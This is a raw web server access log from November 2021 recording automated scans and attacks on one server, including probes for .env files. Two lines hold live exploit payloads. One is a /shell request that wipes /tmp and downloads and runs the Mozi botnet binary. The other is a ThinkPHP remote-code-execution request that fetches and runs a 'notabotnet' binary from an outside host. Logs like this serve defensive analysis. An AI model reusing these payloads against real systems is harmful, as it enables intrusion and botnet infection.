45.80.184.107 - - [07/Nov/2021:02:40:12 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.80.184.107 - - [07/Nov/2021:02:40:13 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
222.186.19.235 - - [07/Nov/2021:02:42:58 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.2 Safari/532.2"
222.186.19.235 - - [07/Nov/2021:02:42:58 +0100] "\x16\x03\x01" 501 318 "-" "-"
222.186.19.235 - - [07/Nov/2021:02:42:58 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Macintosh; AMD Mac OS X 10_8_2) AppleWebKit/535.22 (KHTML, like Gecko) Chrome/18.6.872"
34.140.248.32 - - [07/Nov/2021:02:47:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
222.186.19.235 - - [07/Nov/2021:02:47:21 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.0 Safari/532.0"
222.186.19.235 - - [07/Nov/2021:02:47:21 +0100] "\x16\x03\x01" 501 318 "-" "-"
222.186.19.235 - - [07/Nov/2021:02:47:21 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; fr-FR) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4"
209.141.56.209 - - [07/Nov/2021:02:49:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
69.162.231.10 - - [07/Nov/2021:02:51:50 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.162.231.10 - - [07/Nov/2021:02:51:50 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.162.231.236 - - [07/Nov/2021:02:52:43 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.162.231.236 - - [07/Nov/2021:02:52:44 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
182.254.245.27 - - [07/Nov/2021:02:53:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
69.162.231.236 - - [07/Nov/2021:02:57:25 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.162.231.236 - - [07/Nov/2021:02:57:26 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
117.196.238.52 - - [07/Nov/2021:03:00:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
193.46.255.252 - - [07/Nov/2021:03:05:44 +0100] "GET http://ipinfo.io HTTP/1.1" 400 329 "-" "gbrmss/7.29.0"
221.160.177.181 - - [07/Nov/2021:03:06:46 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://221.160.177.181:4565/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
209.141.56.209 - - [07/Nov/2021:03:06:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
209.141.56.209 - - [07/Nov/2021:03:13:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
35.195.93.98 - - [07/Nov/2021:03:14:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
209.141.56.209 - - [07/Nov/2021:03:18:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
193.46.255.252 - - [07/Nov/2021:03:22:28 +0100] "GET http://ipinfo.io HTTP/1.1" 400 329 "-" "gbrmss/7.29.0"
93.65.23.221 - - [07/Nov/2021:03:23:21 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://45.14.226.120/notabotnet/notabotnet.x86 -O /tmp/.notabotnet; chmod 777 /tmp/.notabotnet; /tmp/.notabotnet ThinkphpRep' HTTP/1.1" 404 310 "-" "Tsunami/2.0"
193.46.255.252 - - [07/Nov/2021:03:24:20 +0100] "GET http://ipinfo.io HTTP/1.1" 400 329 "-" "gbrmss/7.29.0"
